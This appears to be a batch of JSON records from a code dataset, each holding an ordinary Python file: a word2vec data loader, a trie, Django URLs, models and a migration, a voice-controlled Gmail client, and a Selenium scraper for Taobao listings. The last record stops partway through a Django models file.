+{"seq_id":"489113429","text":"# -*- coding: UTF-8 -*-\n#!/usr/bin/python3\n\"\"\"\n@Author Yi Zhu\nUpdated 01/18/2019\nThe code is borrowed from \nhttps://github.com/Adoni/word2vec_pytorch/\nhttps://github.com/ray1007/pytorch-word2vec/\n\"\"\"\n\n#************************************************************\n# Imported Libraries\n#************************************************************\nfrom collections import defaultdict\nimport os\nimport sys\nimport numpy as np\n\nsys.path.append('../')\nfrom word.wordbase_input_data import WordBaseInputData \n\nimport pdb\n\n\nclass WordInputData(WordBaseInputData):\n def __init__(self, args):\n \"\"\"\n vocab_file: file containing word freq pairs\n \"\"\"\n super(WordInputData, self).__init__(args)\n # training corpus\n self.infile = args.train\n # (word freq) dict\n self.vocab_file = self.infile + '.dict'\n # minimun count and the corresponding word list\n self.min_count = args.min_count\n self.min_count_word_file = self.infile + '.{}.word'.format(self.min_count)\n # generate word -> freq vocab_file \n if not os.path.exists(self.vocab_file) or not os.path.exists(self.min_count_word_file):\n print('Did not found vocabulary file, generating vocabulary file...')\n self.gen_vocab()\n \n # multiprocessing\n # split the file into n parts, n = thread_number\n self.start_pos = []\n self.end_pos = []\n self.get_pos(args.thread)\n\n self.idx2ct = None\n self.idx2freq = None\n self.read_vocab()\n self.vocab_size = len(self.word2idx)\n self.word_ct = self.idx2ct.sum()\n \n # create negative sampling distribution\n self.neg_sample_probs = None\n self.init_sample_table()\n \n print('Vocabulary size: {}'.format(self.vocab_size))\n print(\"Words in train file: {}\".format(self.word_ct)) \n\n\n def get_pos(self, thread_n):\n file_size = os.path.getsize(self.infile) #size of file (in bytes)\n #break the file into n chunks for processing.\n file_step = file_size // thread_n if file_size % thread_n == 0 else file_size // thread_n + 1\n initial_chunks = range(1, file_size, file_step)\n with open(self.infile, 'r') as fin:\n self.start_pos = sorted(set([self.newlinebefore(fin, i) for i in initial_chunks]))\n assert(len(self.start_pos) == thread_n)\n self.end_pos = [i - 1 for i in self.start_pos] [1:] + [None]\n\n\n def newlinebefore(self, f, n):\n f.seek(n)\n try:\n c = f.read(1)\n except UnicodeDecodeError:\n c = ''\n while c != '\\n' and n > 0:\n n -= 1\n f.seek(n)\n try:\n c = f.read(1)\n except UnicodeDecodeError:\n continue\n return n\n\n\n def gen_vocab(self):\n \"\"\"\n generate vocab: freq dictionary to vocab_file\n \"\"\"\n word2ct = defaultdict(int)\n line_n = len(open(self.infile, 'r').readlines())\n with open(self.infile, 'r') as fin:\n for i in range(line_n):\n sys.stdout.write('{}/{}\\r'.format(i + 1, line_n))\n sys.stdout.flush()\n line = fin.readline()\n linevec = line.strip().split()\n for w in linevec:\n word2ct[w] += 1\n with open(self.vocab_file, 'w') as fout, open(self.min_count_word_file, 'w') as foutw:\n # sort the pair in descending order\n for w, c in sorted(word2ct.items(), key = lambda x: x[1], reverse = True):\n fout.write('{}\\t{}\\n'.format(w, c))\n if c >= self.min_count:\n foutw.write('{}\\n'.format(w)) \n\n\n def read_vocab(self):\n \"\"\"\n get word: freq from vocab_file\n \"\"\"\n word2freq = defaultdict(int)\n line_n = len(open(self.vocab_file, 'r').readlines())\n with open(self.vocab_file, 'r') as fin:\n for line in fin:\n linevec = line.strip().split()\n assert(len(linevec) == 2)\n word2freq[linevec[0].strip()] = 
int(linevec[1])\n idx = 0\n self.idx2ct = {}\n for w, c in word2freq.items():\n if c < self.min_count:\n # word2freq is already sorted according to count\n break\n self.word2idx[w] = idx \n self.idx2word[idx] = w\n self.idx2ct[idx] = c\n idx += 1\n self.idx2ct = np.array(list(self.idx2ct.values()))\n self.idx2freq = self.idx2ct / self.idx2ct.sum() \n\n\n def init_sample_table(self):\n # according to idx order\n pow_ct = np.array(list(self.idx2ct)) ** 0.75\n words_pow = sum(pow_ct)\n self.neg_sample_probs = pow_ct / words_pow\n\n\n def get_batch_pairs(self, linevec_idx, win_size):\n pairs = []\n for i, w in enumerate(linevec_idx):\n # dynamic window size [1, win_size]\n actual_win_size = np.random.randint(win_size) + 1\n # get context according to window size\n context = linevec_idx[max(0, i - actual_win_size): i] + linevec_idx[i + 1: i + 1 + actual_win_size]\n for c in context:\n pairs.append((w, c))\n return pairs\n","sub_path":"code/word/word_input_data.py","file_name":"word_input_data.py","file_ext":"py","file_size_in_byte":4724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
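The unigram^0.75 trick in init_sample_table above flattens the frequency distribution so that rare words are drawn as negatives a bit more often than their raw counts would allow. A standalone sketch of sampling negatives from that distribution (the counts are illustrative):

    import numpy as np
    counts = np.array([100.0, 10.0, 1.0])            # stands in for idx2ct
    probs = counts ** 0.75 / (counts ** 0.75).sum()  # neg_sample_probs
    negatives = np.random.choice(len(counts), size=5, p=probs)
    print(negatives)                                 # e.g. array([0, 0, 1, 0, 2])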
+{"seq_id":"565963895","text":"\"\"\"\n1. 校验数据集的合法性\n2. 将数据集修改成一列一列的形式\n3. 将一些一维的数据转化成二维的形式\n\"\"\"\nimport numpy as np\n\n\ndef valid_dataset(data, axis=0):\n if ('train' in data) & ('test' in data):\n train = data['train']\n test = data['test']\n [train_flag, train] = valid_data(train, axis)\n if train_flag is False:\n return False, data\n [test_flag, test] = valid_data(test, axis)\n if test_flag is False:\n return False, data\n data['train'] = train\n data['test'] = test\n return True, data\n else:\n return False, data\n\n\ndef valid_data(data, axis=0):\n if ('X' in data) & ('Y' in data):\n x = data['X']\n y = data['Y']\n if axis == 1:\n x = data['X'].T\n y = data['Y'].T\n if x.ndim == 1:\n x = x.reshape(1, x.size)\n if y.ndim == 1:\n y = y.reshape(1, y.size)\n if x.ndim != 2 | y.ndim != 2:\n return False, data\n if x.shape[1] == y.shape[1]:\n data['X'] = x\n data['Y'] = y\n return True, data\n else:\n return False, data\n","sub_path":"utils/validDataset.py","file_name":"validDataset.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"350737785","text":"# coding=utf-8\n\nclass StrTrie:\n def __init__(self):\n self.leaf = {}\n self.value = None\n\n\ndef insert(root, key, value=None):\n if key is None:\n return None\n\n if root is None:\n root = StrTrie()\n\n t = root\n for c in key:\n if c not in t.leaf:\n t.leaf[c] = StrTrie()\n t = t.leaf[c]\n\n t.value = value\n return root\n\n\ndef search(root, key):\n if key is None:\n return None\n\n t = root\n for c in key:\n if c not in t.leaf:\n return None\n t = t.leaf[c]\n\n return t.value\n\n\ndef form_map(m, insert_func):\n root = None\n for k, v in m.items():\n root = insert_func(root, k, v)\n\n return root\n\n\ndef map_to_trie(m):\n form_map(m, insert)\n","sub_path":"hota/basic/algorithm/struct/trie/str_trie.py","file_name":"str_trie.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"599511180","text":"\"\"\"chawkesdj URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.10/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\n#from django.urls import path\nfrom django.contrib import admin\nfrom chawkesdj import views as cdj_views\n\nurlpatterns = [\n url(r'^$', cdj_views.index),\n url(r'^events/', include('events.urls')),\n url(r'^shareShack/', include('shareShack.urls')),\n url(r'^foodCosts/', include('foodCosts.urls')),\n url(r'^layout/$', cdj_views.layout),\n url(r'^about/$', cdj_views.about),\n url(r'^admin/', admin.site.urls),\n url(r'^accounts/', include('accounts.urls', namespace=\"accounts\")),\n]\n","sub_path":"chawkesdj/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"42028640","text":"import speech_recognition as sr\r\nimport smtplib\r\nfrom bs4 import BeautifulSoup\r\nimport email\r\nimport imaplib\r\nfrom gtts import gTTS\r\nimport pyglet\r\nimport os, time\r\nfrom email.header import decode_header\r\nimport webbrowser\r\n#pyglet.lib.load_library('avbin')\r\n#pyglet.have_avbin=True\r\n\r\n#function to give reply as 'ok done' to user\r\ndef ok_done():\r\n tts = gTTS(text=\"Ok Done!\", lang='en')\r\n ttsname=(\"okdone.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n print (\"ok done!! \\n\")\r\n\r\n#function for error when audio could not be recognised\r\ndef error1():\r\n tts = gTTS(text=\"Google Speech Recognition could not understand audio.\", lang='en')\r\n ttsname=(\"error1.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n print(\"Google Speech Recognition could not understand audio. \\n\")\r\n choices()\r\n\r\n#function for google speech recognition service error\r\ndef error2():\r\n tts = gTTS(text=\"Could not request results from Google Speech Recognition service\", lang='en')\r\n ttsname=(\"error2.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n print(\"Could not request results from Google Speech Recognition service \\n\")\r\n choices()\r\n\r\n#function for going back to choices menu or exiting the program\r\ndef backtomenu():\r\n tts = gTTS(text=\"Do you want to go back to choices menu for performing other actions or Do you want to Exit? Reply with Yes Or Exit Only.\", lang='en')\r\n ttsname=(\"backtomenu.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n print(\"Do you want to go back to choices menu for performing other actions or Do you want to Exit?\")\r\n r = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n audio=r.listen(source)\r\n text=r.recognize_google(audio)\r\n print(\"you said : \" + text + \"\\n\")\r\n if text == \"yes\" or text == \"Yes\":\r\n choices() \r\n else:\r\n exit()\r\n\r\n#function to take mail subject as input\r\ndef input_subject():\r\n tts = gTTS(text=\"Please Provide Subject For your Mail\", lang='en')\r\n ttsname=(\"sub_mail.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n\r\n r = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print(\"Please Provide Subject For your Mail.\")\r\n audio=r.listen(source)\r\n input_subject.subject = r.recognize_google(audio)\r\n print(input_subject.subject +\"\\n\")\r\n ok_done()\r\n\r\n tts = gTTS(text=input_subject.subject, lang='en')\r\n ttsname=(\"sub_repeat.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n print(\"your subject is : \" + input_subject.subject +\"\\n\")\r\n validating_sub_input() \r\n\r\n#function to take mail body as input\r\ndef input_body():\r\n tts = gTTS(text=\"Please Provide Body Context For your Mail.\", lang='en')\r\n ttsname=(\"body_mail.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n 
time.sleep(music.duration)\r\n os.remove(ttsname)\r\n\r\n r = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print(\"Please Provide Body For your Mail.\")\r\n audio=r.listen(source)\r\n input_body.body = r.recognize_google(audio)\r\n print(input_body.body +\"\\n\")\r\n ok_done()\r\n\r\n tts = gTTS(text=input_body.body, lang='en')\r\n ttsname=(\"body.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n print(\"your body is : \" + input_body.body +\"\\n\")\r\n validating_body_input()\r\n\r\n#function to validate subject\r\ndef validating_sub_input():\r\n tts = gTTS(text=\"Is the provided input correct? Reply with yes or no only.\", lang='en')\r\n ttsname=(\"val_input.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n \r\n r = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print(\"Is the provided input correct?\")\r\n audio=r.listen(source)\r\n text = r.recognize_google(audio)\r\n print(\"you said: \"+ text + \"\\n\")\r\n ok_done()\r\n if text == \"yes\" or text == \"YES\":\r\n input_body()\r\n else:\r\n input_subject() \r\n\r\n#function to validate body\r\ndef validating_body_input():\r\n tts = gTTS(text=\"Is the provided input correct? Reply with yes or no only.\", lang='en')\r\n ttsname=(\"val_input.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n \r\n r = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print(\"Is the provided input correct?\")\r\n audio=r.listen(source)\r\n text = r.recognize_google(audio)\r\n print(\"you said: \"+ text + \"\\n\")\r\n ok_done()\r\n if text == \"yes\" or text == \"YES\":\r\n mail_send()\r\n else:\r\n input_body() \r\n\r\n#function to send mail\r\ndef mail_send():\r\n gmail_user = main.fullemail\r\n gmail_password = main.password\r\n\r\n sent_from = gmail_user\r\n to = [choices.remail]\r\n subject = input_subject.subject\r\n body = input_body.body\r\n\r\n email_text = f'Subject: {subject}\\n\\n{body}'\r\n\r\n server = smtplib.SMTP_SSL('smtp.gmail.com', 465)\r\n server.ehlo()\r\n server.login(main.fullemail, main.password)\r\n server.sendmail(sent_from, to, email_text)\r\n server.close()\r\n \r\n tts = gTTS(text=\"Congrats! Your mail has been sent. \", lang='en')\r\n ttsname=(\"mailsend.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n\r\n print (\"Congrats! Your mail has been sent. 
\\n\")\r\n \r\n backtomenu()\r\n\r\n#function to call the title\r\ndef main_project():\r\n tts = gTTS(text=\"Welcome to the Voice based Email Application\", lang='en')\r\n ttsname=(\"title.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n print(\"Welcome to the Voice based Email Application \\n\")\r\n main()\r\n\r\n#main function of program\r\ndef main():\r\n tts = gTTS(text=\"Please Provide your Gmail I D without @gmail.com\", lang='en')\r\n ttsname=(\"I_mail.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n r = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print(\"Please Provide your Gmail ID without @gmail.com.\")\r\n eaudio=r.listen(source)\r\n email_ID = r.recognize_google(eaudio)\r\n ok_done()\r\n emailcorrected = email_ID.replace(\" \",\"\")\r\n emaildomain = \"@gmail.com\"\r\n main.fullemail = emailcorrected + emaildomain\r\n print(\"your mail id is : \" + main.fullemail + \"\\n\")\r\n \r\n tts = gTTS(text=\"Please Provide your Gmail I D Password\", lang='en')\r\n ttsname=(\"P_mail.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n\r\n r = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print(\"Please Provide your Gmail ID Password.\")\r\n P_audio=r.listen(source)\r\n input_password = r.recognize_google(P_audio)\r\n main.password = input_password.replace(\" \",\"\")\r\n print(\"your password is : ********** \\n\")\r\n ok_done()\r\n \r\n mail = smtplib.SMTP('smtp.gmail.com',587)\r\n mail.ehlo()\r\n mail.starttls()\r\n try:\r\n mail.login(main.fullemail,main.password)\r\n tts = gTTS(text=\"You have Succesfully Logged In to your email account!\", lang='en')\r\n ttsname=(\"success.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n print(\"Succesfully Logged In! \\n\")\r\n choices()\r\n\r\n except smtplib.SMTPAuthenticationError:\r\n tts = gTTS(text=\"Your Mail I d And Password does not match. Please Provide Your Credentials again\", lang='en')\r\n ttsname=(\"auth_error.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n print(\"Id And Password does not match \\n\")\r\n main()\r\n \r\ndef choices():\r\n print (\"Select What You Want to do\")\r\n tts = gTTS(text=\"Select your choice\", lang='en')\r\n ttsname=(\"choice_title.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n\r\n print (\"1. Compose a mail.\")\r\n tts = gTTS(text=\"Say First if you want to Compose A Mail.\", lang='en')\r\n ttsname=(\"choice1.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n\r\n print (\"2. 
Check your inbox \\n\")\r\n tts = gTTS(text=\"Say Second if you want to Check Your Inbox\", lang='en')\r\n ttsname=(\"choice2.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n\r\n tts = gTTS(text=\"Your choice\", lang='en')\r\n ttsname=(\"yourchoice.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n\r\n r = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print (\"Your choice: \\n\")\r\n audio=r.listen(source)\r\n text=r.recognize_google(audio)\r\n\r\n print (\"You said : \"+text + \"\\n\")\r\n ok_done()\r\n#-----------------------------------------------------------------------------------------------\r\n if text == 'first' or text == 'fast' or text == 'First':\r\n tts = gTTS(text=\"Please Provide recipient's Gmail I D without @gmail.com\", lang='en')\r\n ttsname=(\"R_mail.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n print (\"ok done!!\")\r\n\r\n r = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print(\"Please Provide recipient's Gmail ID without @gmail.com.\")\r\n raudio=r.listen(source)\r\n rmail_ID = r.recognize_google(raudio)\r\n ok_done()\r\n rmailcorrected = rmail_ID.replace(\" \",\"\")\r\n rmaildomain = \"@gmail.com\"\r\n choices.remail = rmailcorrected + rmaildomain\r\n print(choices.remail + \"\\n\")\r\n input_subject() \r\n#-----------------------------------------------------------------------------------------------\r\n if text == 'Second' or text == 'second' :\r\n mail = imaplib.IMAP4_SSL('imap.gmail.com',993)\r\n mail.login(main.fullemail,main.password)\r\n stat, total = mail.select('Inbox')\r\n totalstr = str(total)\r\n corrected_total = totalstr.replace('b','')\r\n print (\"Number of mails in your inbox :\"+ corrected_total)\r\n tts = gTTS(text=\"Total mails are :\"+corrected_total, lang='en')\r\n ttsname=(\"total.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n\r\n #unseen mails\r\n mail.select()\r\n unseen = len(mail.search(None, 'UnSeen')[1][0].split()) # unseen count\r\n print (\"Number of UnSeen mails :\" + str(unseen))\r\n tts = gTTS(text=\"Your Unseen mail :\"+str(unseen), lang='en')\r\n ttsname=(\"unseen.mp3\") \r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n\r\n # account credentials\r\n username = main.fullemail\r\n password = main.password\r\n\r\n def clean(text):\r\n # clean text for creating a folder\r\n return \"\".join(c if c.isalnum() else \"_\" for c in text)\r\n\r\n # create an IMAP4 class with SSL \r\n imap = imaplib.IMAP4_SSL(\"imap.gmail.com\")\r\n # authenticate\r\n imap.login(username, password)\r\n\r\n tts = gTTS(text=\"Do you want to see the unseen mails\", lang='en')\r\n ttsname=(\"unseenmails.mp3\") \r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n r = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print(\"Do you want to see the unseen mail?\")\r\n audio=r.listen(source)\r\n text = r.recognize_google(audio)\r\n ok_done()\r\n print(\"you said : \" + text + \"\\n\")\r\n if 
text == 'yes' or text == 'Yes':\r\n N=unseen\r\n else:\r\n exit() \r\n\r\n status, messages = imap.select(\"INBOX\")\r\n # number of top emails to fetch\r\n # total number of emails\r\n messages = int(messages[0])\r\n for i in range(messages, messages-N, -1):\r\n # fetch the email message by ID\r\n res, msg = imap.fetch(str(i), \"(RFC822)\")\r\n for response in msg:\r\n if isinstance(response, tuple):\r\n # parse a bytes email into a message object\r\n msg = email.message_from_bytes(response[1])\r\n # decode the email subject\r\n subject, encoding = decode_header(msg[\"Subject\"])[0]\r\n if isinstance(subject, bytes):\r\n # if it's a bytes, decode to str\r\n subject = subject.decode(encoding)\r\n # decode email sender\r\n From, encoding = decode_header(msg.get(\"From\"))[0]\r\n if isinstance(From, bytes):\r\n From = From.decode(encoding)\r\n print(\"Subject:\", subject)\r\n tts = gTTS(text=\"Subject of Received mail is \" + subject, lang='en')\r\n ttsname=(\"subv.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n print(\"From:\", From)\r\n tts = gTTS(text=\"Mail is from\" + From, lang='en')\r\n ttsname=(\"fromv.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n # if the email message is multipart\r\n if msg.is_multipart():\r\n # iterate over email parts\r\n for part in msg.walk():\r\n # extract content type of email\r\n content_type = part.get_content_type()\r\n content_disposition = str(part.get(\"Content-Disposition\"))\r\n try:\r\n # get the email body\r\n body = part.get_payload(decode=True).decode()\r\n except:\r\n pass\r\n if content_type == \"text/plain\" and \"attachment\" not in content_disposition:\r\n # print text/plain emails and skip attachments\r\n print(body)\r\n if(len(body) == 0):\r\n pass\r\n else:\r\n tts = gTTS(text=body, lang='en')\r\n ttsname=(\"printbody.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n elif \"attachment\" in content_disposition:\r\n # download attachment\r\n filename = part.get_filename()\r\n if filename:\r\n folder_name = clean(subject)\r\n if not os.path.isdir(folder_name):\r\n # make a folder for this email (named after the subject)\r\n os.mkdir(folder_name)\r\n filepath = os.path.join(folder_name, filename)\r\n # download attachment and save it\r\n open(filepath, \"wb\").write(part.get_payload(decode=True))\r\n else:\r\n # extract content type of email\r\n content_type = msg.get_content_type()\r\n # get the email body\r\n body = msg.get_payload(decode=True).decode()\r\n if content_type == \"text/plain\":\r\n # print only text email parts\r\n print(body)\r\n if(len(body) == 0):\r\n pass\r\n else:\r\n tts = gTTS(text=body, lang='en')\r\n ttsname=(\"printbody.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n print(\"=\"*100)\r\n # close the connection and logout\r\n imap.close()\r\n imap.logout()\r\n backtomenu()\r\n#-----------------------------------------------------------------------------------------------\r\n else:\r\n tts = gTTS(text=\"Please Select the correct choice. Going Back to Choices Menu\", lang='en')\r\n ttsname=(\"elsechoice.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, 
streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n choices()\r\n\r\nmain_project()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":20105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"56426770","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('plataforma', '0047_auto_20151109_1206'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Conversacion',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('busqueda', models.ForeignKey(related_name='busqueda_', to='plataforma.ProblemaSolucion')),\n ('respuesta', models.ForeignKey(related_name='respuesta_', to='plataforma.ProblemaSolucion', null=True)),\n ],\n ),\n migrations.CreateModel(\n name='Mensaje',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('mensaje', models.TextField(null=True)),\n ('fecha', models.DateTimeField(auto_now=True)),\n ('conversacion', models.ForeignKey(to='plataforma.Conversacion')),\n ],\n ),\n ]\n","sub_path":"plataforma/migrations/0048_conversacion_mensaje.py","file_name":"0048_conversacion_mensaje.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"30763739","text":"import pymongo\nfrom selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import quote\nfrom config import *\n\nchrome_options = webdriver.ChromeOptions()\nchrome_options.add_argument('--headless')\nbrowser = webdriver.Chrome(chrome_options = chrome_options)\n\nwait = WebDriverWait(browser, 10)\nclient = pymongo.MongoClient(MONGO_URL)\ndb = client[MONGO_DB]\n\ndef index_page(page):\n print('正在爬取第', page, '页')\n try:\n url = 'https://s.taobao.com/search?q=' + quote(KEYWORD)\n browser.get(url)\n if page > 1:\n input = wait.until(\n EC.presence_of_element_located((By.CSS_SELECTOR, '#spudetail-pager div.form > input'))\n )\n submit = wait.until(\n EC.element_to_be_clickable((By.CSS_SELECTOR, '#spudetail-pager div.form > span.btn.J_Submit'))\n )\n input.clear()\n input.send_keys(page)\n submit.click()\n wait.until(\n EC.text_to_be_present_in_element((By.CSS_SELECTOR, '#spudetail-pager li.item.active > span'), str(page))\n )\n wait.until(\n EC.presence_of_element_located((By.CSS_SELECTOR, '.m-itemlist .items .item'))\n )\n get_products()\n except TimeoutException:\n index_page(page)\n\ndef get_products():\n html = browser.page_source\n doc = BeautifulSoup(html, 'lxml')\n items = doc.select('#spudetail-itemlist .items .item')\n for index in range(min(len(items), MAX_INDEX)):\n item = items[index]\n product = {\n 'image': item.select('.pic .img')[0]['src'],\n 'price': item.select('.price')[0].get_text(),\n 'deal': item.select('.deal-cnt')[0].get_text(),\n 'title': item.select('.title')[0].get_text(),\n 'shop': item.select('.shop')[0].get_text(),\n 'location': item.select('.location')[0].get_text()\n }\n print(product)\n save_to_mongo(product)\n\ndef save_to_mongo(result):\n try:\n if db[MONGO_COLLECTION].insert(result):\n print('存储到MongoDB成功')\n except Exception:\n print('存储到MongoDB失败')\n\ndef main():\n for i in range(1, MAX_PAGE + 1):\n index_page(i)\n browser.close()\n\nif __name__ == '__main__':\n main()\n","sub_path":"taobao/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"339162784","text":"# -*- coding: utf-8 -*-\n\nfrom django.db import models\nfrom django.contrib import admin\nfrom django.forms import ModelForm\nfrom django.contrib.contenttypes.fields import GenericForeignKey\nfrom django.contrib.contenttypes.generic import GenericRelation\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth.models import User\nfrom mptt.models import MPTTModel, TreeForeignKey\nfrom django.utils import timezone\nfrom datetime import datetime\nfrom annoying.fields import JSONField # django-annoying\nfrom django.db.models import Q\nfrom datetime import datetime as dt\n\nclass MyBaseModel (models.Model):\n\t# fields\n\thash = models.CharField (\n\t\tmax_length = 256, # we don't expect using a hash more than 256-bit long!\n\t\tnull = True,\n\t\tblank = True,\n\t\tdefault = '',\n\t\tverbose_name = u'MD5 hash'\n\t)\n\t\t\n\t# basic value fields\n\tname = models.CharField(\n\t\t\tdefault = None,\n\t\t\tmax_length = 128,\n\t\t\tverbose_name = u'名称'\n\t\t)\n\tdescription = models.TextField (\n\t\t\tnull=True, \n\t\t\tblank=True,\n\t\t\tverbose_name = u'描述'\n\t\t)\n\t\n\t# help text\n\thelp_text = models.CharField (\n\t\t\tmax_length = 64,\n\t\t\tnull = True,\n\t\t\tblank = True,\n\t\t\tverbose_name = u'帮助提示'\n\t\t)\n\n\t# attachments\n\tattachments = GenericRelation('Attachment')\n\t\n\t# this is an Abstract model\n\tclass Meta:\n\t\tabstract=True\n\n\tdef __unicode__(self):\n\t\treturn self.name\n\n######################################################\n#\n#\tTags\n#\n#####################################################\nclass MyTaggedItem (models.Model):\n\t# basic value fields\n\ttag = 